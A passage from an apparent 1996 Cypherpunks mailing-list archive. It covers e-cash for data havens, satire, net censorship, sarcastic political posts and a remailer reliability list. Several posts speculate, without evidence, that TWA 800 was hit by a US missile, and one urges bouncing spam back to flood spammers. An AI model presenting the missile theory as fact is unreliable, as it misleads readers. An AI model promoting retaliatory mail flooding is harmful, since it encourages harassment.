one has to cover the issue of cost. After all, it takes some expenditure 
of resources to store data, which can translate to actual $$ (or riyals 
or dinar or kroner or whatever). So far that I've seen, the problem of 
delivering that payment has been put down to "e-cash payment" 
of some kind (hopefully untraceable), or creative wire transfer. In both 
cases, we end up needing to implement e-cash on a wide-scale basis, or 
completely reforming the way banks work in most countries. After all that 
trouble, then, our value is still stored in terms of a real currency.

What if a node in a data haven could issue its own certificates/money for 
goods/services? The idea seems similar to me to the "TrustBucks" 
discussed recently on the list. A node's operator issues credits to 
others in exchange for money, favors, or space on their own machines. 
However, if every node issues its own currency, but only to those it 
trusts, we have the same problem as w/PGP...there is no guarantee that 
data may flow freely from node to node, which invites weakness. It's also 
an open invitation to inflation, as each operator may mint many billions 
of $ w/o immediate consequences (perhaps combined w/spam in a misguided 
publicity attempt?)

Question : would it be preferable for a group of nodes to issue e-cash? 
I'm thinking in terms of a system where the bank's secret key is split 
between the participating nodes (or a certain voting subset), with a 
certain threshold needed to mint new currency. If there are several such 
constallations (and methods of exchanging currency between them), it 
multiplies the number of points one must subvert in order to manipulate 
the system. Perhaps groupings might agree to share stored data 
freely between nodes in the interests of security. 

	A user then has 
several different "economies" to choose from, each of which has different 
policies. Once a data haven begins to devrive actual _income_ or benefit 
from these transactions, its attitude toward economic policy may affect 
its ability to secure and retreive data on command. A rich haven, for 
instance, may be able to afford better bandwidth between nodes, or 
funding for research into distributed computing. In contrast, a "poor" 
haven may suffer from outdated equipment, hardware failures, and possibly 
intermittent loss of data.

	 Of course, such effects will not be 
particularly pronounced so long as a data haven is largely a volunteer 
effort. If a haven were to evolve into a socially stronger entity, with 
clearly defined "rights" and "responsibilities" for nodes, then its 
policies would have greater effect. I do not see a guarantee that such a 
structure would be anarchic in nature, even though the technology itself 
is amenable. Y'know, a group currency could prove to be a 
powerful tool to assert dominance/influence over a single node, much as 
we may speak about "dollar zones" or "yen blocs" in the real world.

Gridlock might also be a problem...what if the system is set up to demand 
unanimous consent, but one of the nodes just died? How does one cast out 
a node or add a new one without collecting the bank's key in one place? 
What's to stop me from adding myself as a node under 15 assumed names? 

My concern is that these fears might engender the kind of 3l33t mindset 
sometimes seen on really lame wAR3z BBSs : a small power group, intense 
distrust of outsiders, almost cultish fac,ade of devotion to said small 
power group, et. al. None of which is helpful.

Comments? Is it a good idea, or will it lead to ever-more confusion?
Sorry if this is a bit long, repetitive of other things previously 
discussed to death elsewhere, or rambling. :-)

-David Molnar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Mon, 9 Sep 1996 15:52:03 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: [NOISE] Far-reaching tentacles . . . ?
In-Reply-To: <ae58bfd30d0210042a69@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.960909015221.15888B-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


       Who cares! Computers are computers. I wish someone would send me
one,reconditioned or not. I am back on a dumb terminal because my 8088's
hd gave up the ghost and deceided to leave it at the shop while I
upgrade.


On Sun, 8 Sep 1996, Timothy C. May wrote:



> At 11:38 PM 9/8/96, Alan Bostick wrote:
> >Found in the news:
> >
> >
> >        (SACRAMENTO)- The principals of six Sacramento area schools have
> >received 46 used computers that were renovated by inmates at Folsom
> >Prison. Warden Theo White delivered the machines after they were given a
> >reprieve from the scrap heap. The prison obtained the donated personal
> >computers from the non-profit Detwiler Foundation... which began working
>                                ^^^^^^^^^^^^^^^^^^^
> >five years ago to bring new technology into the state's classrooms.
> >
> >[Would you want *YOUR* CHILDREN to use computers that had been HACKED
> >by CONVICTED CRIMINALS????]
> 
> Who cares about the convicted criminals? It's the connection to the
> Detwiler Foundation that would worry me.
> 
> (Now that's what you call an S. Boxx!)
> 
> --Medusa
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DAVID A MOLNAR <molnard1@nevada.edu>
Date: Mon, 9 Sep 1996 19:10:00 +0800
To: Greg Kucharo <sophi@best.com>
Subject: Re: Conservation Laws, Money, Engines, and Ontology
In-Reply-To: <199609090401.VAA26172@dns2.noc.best.net>
Message-ID: <Pine.OSF.3.91.960909015444.1677B-100000@pioneer.nevada.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 8 Sep 1996, Greg Kucharo wrote:

>   Here's where reputations could come in.  You cound't open a new account
> anywhere without a good "reputation".  This could aid in balancing the load
> of certain people.
	Hey, if we're going to do that, why not go all the way and 
imagine a "virtuous society" in which e-cash is based on reputation. In 
order to obtain v$, one must submit to a "reputation asessment" by one of 
several firms, which then issue a given amount of v-cash based on their 
findings. An ISP simply requires an arbitrary amount of v-cash along with 
the usual $$ every month. At the end of the month, your friendly Moral 
Monitor greps thru Usenet and all the mailing lists he monitors looking 
for your name, then adjusts your account accordingly. 

Different moral codes would have different agencies. :-)

For this service, of course, you pay a modest fee. But it's a small price 
to pay for spiritual peace of mind. Perhaps we'd see the rise of 
reputation constultants in such a system. How about people with such large 
"fortunes" that they create wealth simply by being associated with 
someone else? 

Don't forget the block meetings. :-> 

-David Molnar

Phil Dick is dead, alas...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 10:17:10 +0800
To: cypherpunks@toad.com
Subject: SPL -- Suspicious Persons List
Message-ID: <ae59b08c16021004b99b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming
in this morning. I'm sure you're busy, so I'll make this as short as
possible. OK with you?"

Joseph Shlubsky, Programmer: "Uh, sure." <nervously>

Digitaltronics: "Joe, we have a problem. We understand that on your last
two business trips you've been flagged for Special Processing at airport
security. We checked, and it seems you're on the Suspicious Persons List.
As you know, this causes problems for your fellow travellers (no pun
intended, eh Joe <laughs>). And, Joe, it undermines the corporate image for
one of our people to be on the SPL. I'm sure you see our problem?"

JS: "Uh...."

Digitaltronics: "Joe, we're not sure what you've been doing to get yourself
put on the SPl, and we're forbidden by the Fairness in Employment Act from
even asking you about your interests and affiliations, but we really can't
have representatives of Digitaltronics being pulled aside for SPL
processing, now can we?"

JS: "But I told them I was only carrying a briefcase, and that they could
search it all they wanted to, and--"

Digitaltronics: "Joe, I'm sorry, but we're going to have to let you go. You
know how these things are. Nothing can be done. Not our decision, when you
think about it. The government has their ideas of who should be on the
Suspicious Persons List, and there's just nothing we can do about it. We
just can't have our corporate image linked to persons on the SPL. Now, Joe,
you'll get a generous 6 weeks of severance pay, and Daphne will assist you
with your outplacement processing. Of course, Joe, you will have to go
through an inspection every morning until you're fully processed...there's
that SPL matter, you know." <laughs>

JS: "Uh..."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 10:40:37 +0800
To: cypherpunks@toad.com
Subject: Re: China joins Singapore, Germany, ....
Message-ID: <ae59b4b317021004b37a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:29 PM 9/9/96, Duncan Frissell wrote:

>Course there hasn't really been much net censorship.  Germany and China's
>attempts have not been effective.  The Feds lack a mechanism for "blocking
>sites."  There is no one in a position to give such an order.  There is no
>chance that such an order would be obeyed in any widespread way in any case.
>Outlaw boards crackdowns didn't diminish the number of outlaw boards.  Porno
>boards crackdowns did not diminish the number of porno boards.  Since it is
>easier to create a site than it is to set up a board, legal maneuvers by the
>Feds won't work.
>
>Making sites "illegal to connect to" is meaningless because most users won't
>even know what is on the list and most of those who do will be encouraged to
>connect to them rather than discouraged.

While I agree with Duncan's sentiments (obviously) and even agree that
censorship is impossible to completely implement, I think Duncan is
oversimplifying and thus trivializing the dangers to Chinese, German,
Singaporan, etc., subjects.

Prison sentences in Germany for those who reveal forbidden information
about "the Holocaust," prison terms (or worse) for dissidents in Burma,
China, and, of course, various other nations and "democratic people's
republics."

Even here in the United States, connecting to an illegal site may mean
imprisonment. (The charge: trafficking in child pornography, for example.)

Rather than saying such laws are "meaningless," developing blinded,
steganographic, etc. proxies may be a more useful strategy.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 10:26:09 +0800
To: cypherpunks@toad.com
Subject: Re: ... subversive leftists
Message-ID: <ae59b6a31802100427f6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:57 PM 9/9/96, William H. Geiger III wrote:
>In <Pine.LNX.3.94.960909125148.16761A-100000@blau.pin.de>, on 09/09/96 at
>12:53 PM,
>   Stephan Schmidt <schmidt@pin.de> said:
>
>
>>I hope this one was ironic.
>
>>> The Democratic People's German Reich is fully justified in cutting off
>>> contacts with subversive radical publications in Jew-dominated nations like
>>> Holland.
>>>
>>> As Reichskommander Schmidt points out: "The citizen-units who access
>>     ^^^^^^^^^^^^^^^^^^^^^^^
>>But this one is tasteless and insulting even if it was
>>meant ironic.
>
>If the boot fits.......
>

I don't know why Stephan waited so many days to make his comment. It was my
noticing that I had "collided" with his name, Schmidt, when I made my
facetious post that caused me to almost immediately issue a clarification
that I was not thinking of him when I made my first post.

To be clear, again, I was not basing my "Reichskommander Schmidt" line on
Stephan Schmidt. That was just a coincidence.

As to the "Reichskommander," in our country, and on the Net, such jokes are
not illegal. I rather suspect they are in Germany, either the DDR or the
Western side.

As to "tasteless and insulting," a matter of personal perspective. I find
it helpful to call a spade a spade, and others apparently do as well.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 9 Sep 1996 23:58:37 +0800
To: Stephan Schmidt <schmidt@pin.de>
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <Pine.LNX.3.94.960909103404.13757A-100000@blau.pin.de>
Message-ID: <Pine.SUN.3.91.960909054628.177C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Not having any accounts inside Germany, I can only say what I hear from the 
folks running xs4all, which is that only some ISPs have complied.

-Declan


On Mon, 9 Sep 1996, Stephan Schmidt wrote:

> 
> September 9th,
> 
> I _can_ _access_ www.xs4all.nl _from_ _inside_ _Germany_.
> 
> -stephan
> 
> PS: using 3 different routes (accounts).
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 10:32:15 +0800
To: cypherpunks@toad.com
Subject: U.S. as a Terrorist State
Message-ID: <ae59c7ff190210043be8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:29 PM 9/9/96, Duncan Frissell wrote:

>And I support a terrorist organization (the US Government) every year
>whether I want to or not.  The US was convicted of a major violation of
>international law (akin to terrorism) in the International Court of Justice
>back in the '80s for air sowing mines in Nicaragua's main harbor.

This is a lie, a lie by the subversive left.

As is well-known, the recent unpleasantness surrounding the Sandanista
State was a police action in which Air America was protecting its
agricultural subsidies to certain freedom-loving, non-leftist nations.
Principally Bolivia, Columbia, and Peru.

As noted foodstuff vendor, the Culinary Institute of America, was the prime
importer of these agricultural products, the CIA was of course involved in
this police action to protect the flow of their goods. The mining of a
harbor of a state with which we are not at war, and which has a government
elected by a democratic process, is justified if the Commander in Chief
believes it is.

When the U.S. funds freedom fighters in Iran and Iraq, this is different of
course from when Libya funds terrorists. (It is different because our
Commander in Chief tells us it is.)

That the World Court would find the United States guilty of terrorist
actions (and cases are pending involving the U.S.-funded bombing of Cuban
planes, the use of bomblets in toys dropped in other police action cases,
and the funding of the Brigate Rose by Gehlen operatives...) shows the
World Court is becoming dangerously independent. I suggest the U.S. cut off
funding until it learns to heel.


--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <netsurf@pixi.com>
Date: Tue, 10 Sep 1996 04:11:06 +0800
To: cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <960906233848_279253392@emout14.mail.aol.com>
Message-ID: <Pine.SV4.3.91.960909060804.2457A-100000@netsurfer>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 6 Sep 1996 AwakenToMe@aol.com wrote:

> Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces
> of  mail you take LESS than a second to delete them both with the handy
> delete key. These people are wasting more time complaining about it than they
> will ever do actually deleting it.

If you know a valid email address on the spammers system you can always 
bounce each message back to them.  If enough people turned the messages 
back on them it might give them the opportunity to experience first hand 
what its like to receive tons of mail you don't want or need...

#include <standard.disclaimer>
                    _   __     __  _____            ____
                   / | / /__  / /_/ ___/__  _______/ __/__  _____
                  /  |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/
                 / /|  /  __/ /_ ___/ / /_/ / /  / __/  __/ /
================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/===============






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Mon, 9 Sep 1996 18:52:32 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: TWA 800 - Serious thread.
In-Reply-To: <323227A1.C1B@gte.net>
Message-ID: <Pine.3.89.9609090454.B18246-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


Okay, I'm not paranoid, but I *do* see that something's fishy.

How come the whitehouse Chief of Staff announces just a few days 
after the explosion that an explosive chemical residue was found, and
then -- the whitehouse distances itself from his report?!?!

Supposedly now, we're hearing that the early tests were ruled 
"inconclusive".  Hmmmm.  I'm curious what criteria determines whether or 
not a test can be considered "conclusive".  Might political volatility 
have something to do with it?

The US has our best men working on this - they are professionals.  Of 
course if an early test came up positive, they would devote all 
necessary resources at the highest priority to investigate that
angle completely, and immediately clear up any doubts about the validity 
of the test in question.  For this reason, I can't swallow that "they 
didn't know" about the chemical residue until recently.  Especially with 
the Chief of Staff's early remarks.

We've been told since day one that this investigation were being handled 
"as if it were a crime."  In my mind, I've been hoping that this might 
shed some positive light on the contradictory signals we're being fed.  
Although it's pretty clear they're definitely withholding information, it 
just _might_ be that this is being done in a fashion intended to help 
with the investigation.  Remember the World Trade Center investigation?
They knew immediately what type of vehicle the blast was in - but they 
deliberately gave false information to the media.  They said they were 
looking into a blue stationwagon or some such BS, and the culprits believed 
it!  Federal agents staked out the rental agency where the _van_ was rented
from and caught one of the buggers, who thought the investigation was way 
off track.  Yes!!!

In other words, I'm willing to wait patiently for the truth to come out, 
if the professionals in charge deem it advantageous for the course of the 
investigation.  

Of course the NTSB is behaving like a puppet.  I'm sure the Navy & FBI can 
do a much better job at the investigation than the NTSB could ever hope 
to do.  This is as it should be.

But if we find out *AFTER* the presidential election that it was friendly 
fire which downed TWA 800, then...  words fail me regarding such a scenario.

(FYI One witness described hearing "a sonic boom" (which is consistent with 
the supersonic flight of a missile.)  It is significant that he described 
it as a sonic boom.  He described first hearing it, then looking up to 
witness the explosion.  He was interrogated at length about this detail, 
since as with lightning, the sound should have followed the explosion by 
several seconds.  Unless of course, it was a true sonic boom caused by a 
missile on its way up to the plane.  Recall the other reports of "streaks of 
light" leading up to and hitting the plane.  Hmm!!!)

ObCrypto: Learning the truth about the government's use of the media, 
especially regarding when & how we are manipulated, can tell us _much_ 
about the relevancy of crypto in our daily lives.  In particular, 
learning the truth is a skill we cannot allow to atrophy if this is the 
same political entity which seeks to implement key escrow.  I say, the 
thread is relevant.  Fortunately this forum reaches some of the most
intelligent and well-informed minds on the net.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Mon, 9 Sep 1996 22:59:16 +0800
To: Enzo Michelangeli <gary@systemics.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <2.2.32.19960909114613.006ec718@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:04 PM 9/9/96 +0800, Enzo Michelangeli wrote:

>On Mon, 9 Sep 1996, Gary Howland wrote:
>
>> Enzo Michelangeli wrote:
>>
>> > Perhaps, but defamation is an issue that can't be ignored either,
>> > especially if one tries to build systems based on reputation.
>> 
>> It _is_ an issue that can be ignored - if the "defamer" backs up his
>> claims, then fine, the claims can be shown to be valid, otherwise ignore
>> those claims.  Simple.
>
>I and you may well choose to do so, but the vast majority of the human
>beings believe just anything that is repeated loud and long enough.
>Otherwise, nobody would hire PR and pay for advertisement, politicians
>wouln't be fedwith taxpayer's money, Bosnians would trade goods instead
>of gunshots, etc. I'm personally not interested in conjuring up the latest
>utopia for a minoritarian sect of illuminati: I need to live in the real
>world, and push for viable solutions that change it for better, now.
>
>Enzo

One viable solution you can push for: educate the 'vast majority' to
understand that these wordstreams have no mojo, that skepticism is a
surivival skill in the 'Information Age.'

--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 10 Sep 1996 01:38:12 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199609091350.GAA19806@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash ksub latent cut ek mix reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 9 Sep 96 6:45:23 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          +**+********    18:19  99.99%
mix      mixmaster@remail.obscura.com     ++++++++++++  1:04:20  99.98%
exon     remailer@remailer.nl.com         +*******#**#     1:51  99.98%
squirrel mix@squirrel.owl.de              --.++++-+++   1:54:34  99.97%
replay   remailer@replay.com              +*** *+*****     5:02  99.83%
amnesia  amnesia@chardos.connix.com       +----------   3:22:14  99.78%
balls    remailer@huge.cajones.com        +***********     5:08  99.75%
cyber    alias@alias.cyberpass.net        +*+*+*+* ***    27:34  99.47%
lead     mix@zifi.genetics.utah.edu       ++++++++ -++  1:00:20  99.36%
dustbin  dustman@athensnet.com                     -+*  2:46:09  98.70%
middle   middleman@jpunix.com             --+++++  --   1:08:18  98.27%
haystack haystack@holy.cow.net            +###  #*####     3:19  95.26%
extropia remail@miron.vip.best.com        ----------    4:55:16  94.74%
winsock  winsock@c2.org                   -+--------    3:14:43  91.19%
nemesis  remailer@meaning.com             +*******        24:33  57.62%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Mon, 9 Sep 1996 22:33:39 +0800
To: Stephan Schmidt <pstira@escape.com>
Subject: Re: [WAS xs4all.nl] Terrorists
Message-ID: <2.2.32.19960909115015.0070caf0@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 AM 9/9/96 +0200, Stephan Schmidt wrote:

>One thought : How many of you would support terrorist
>web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?

I.e. "How many of you support the right to free speech regardless of content."

Wellll...there is the rule about speech which endangers; "fire in a crowded
theatre" is the cliche-example. What could a terrorist SAY that would
endanger? Personally, I'd rather have terrorists building html than bombs.

--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Mon, 9 Sep 1996 22:26:00 +0800
To: cypherpunks@toad.com
Subject: TWA 800 - hit by an unarmed US missile?
In-Reply-To: <Pine.LNX.3.91.960909070348.27706A-100000@offshore>
Message-ID: <Pine.LNX.3.91.960909074055.27745B@offshore>
MIME-Version: 1.0
Content-Type: text/plain



A collision with an unarmed missile would explain why they are not finding
much evidence of high explosives (the pitting, ruptured metal, and residue). 

If a missile going at supersonic speed hit a 747 in the underbelly, near a
fuel tank, I sure believe that it could take out the 747.  If it was
coming toward the 747, not catching up to it from behind, the collision
speed would be the addition of the two speeds.  In this case a soft
civilian airplane would not stand a chance.  Civilian airplanes are
designed to survive collisions with birds, but not supersonic missiles. 

If the Navy was firing missiles in this area, it really does seem like the
press should be checking out this angle. 

    --  Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 9 Sep 1996 16:29:55 +0800
To: cypherpunks@toad.com
Subject: Re: Photoshop, Steganograhy, and cypherpunks?
Message-ID: <9609090620.AA24328@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Sep 09 08:17:48 1996
>                 Digital watermarking
>                 adds copyright information to
>                 a photograph that doesn't alter the photo's
>                 appearance. The watermark is detectable even
>                 after the photo is edited or printed and rescanned. 
                                               ^^^^^^^^^^^^^^^^^^^^^^
go ahead, have a laugh!!! (or show me an affordable scanner with REAL 8bit 
color and a calibrated color scheme).

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMjO2kBFhy5sz+bTpAQGbCwf/TCkJvS/8Z3ER3YdR7S2jNw0SrIkDXRT/
GtfvKgmTrk+YMI+5Ko9aL7wu2XgdUF5dzjo1slpNBp8hbrMWUGiNufcI5FDnzrqP
z5lCTZefsHounFV8LaQk19iODOAt6EA5Bo7hAMNH4MTsl07dHJ2wudEntmLA4Hpl
Xo1U/u/+PrTROK/O4wHEcDVyMsEFhHW7rBdhx5U5Sh58CtI3ijQ9xfW2L9dCQHUF
+SVaXTgHYaHnpBpKitkAgEEd2m2jVC7E6S0pPkEBm0k0yXzBNT9zBaD5xtUxI/kI
sJWNQCCq4f0VXm1wl27H+FYYUD/VdLc/pniFppmVa+WEDFGGlWXnqw==
=ajST
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Sep 1996 00:35:08 +0800
To: cypherpunks@toad.com
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <Pine.3.89.9609090454.B18246-0100000@skypoint-gw.globelle.com>
Message-ID: <56mZTD63w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Douglas B. Renner" <dougr@skypoint-gw.globelle.com> writes:
> with the investigation.  Remember the World Trade Center investigation?
> They knew immediately what type of vehicle the blast was in - but they
> deliberately gave false information to the media.  They said they were
> looking into a blue stationwagon or some such BS, and the culprits believed
> it!  Federal agents staked out the rental agency where the _van_ was rented
> from and caught one of the buggers, who thought the investigation was way
> off track.  Yes!!!

I recall that the perp rented the vehicle and gave a $400 cash deposit.
He subsequently returned to the rental agency, stated that the vehicle
was stolen, and demanded his cash back. And the Oklahoma City perp was
caught speeding with no licence plates.

Shit. Whoever recruits those terrorists needs a better h.r. department to
screen for stupidity. :-)

> thread is relevant.  Fortunately this forum reaches some of the most
> intelligent and well-informed minds on the net.

Why, thank you!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Sep 1996 23:58:55 +0800
To: cypherpunks@toad.com
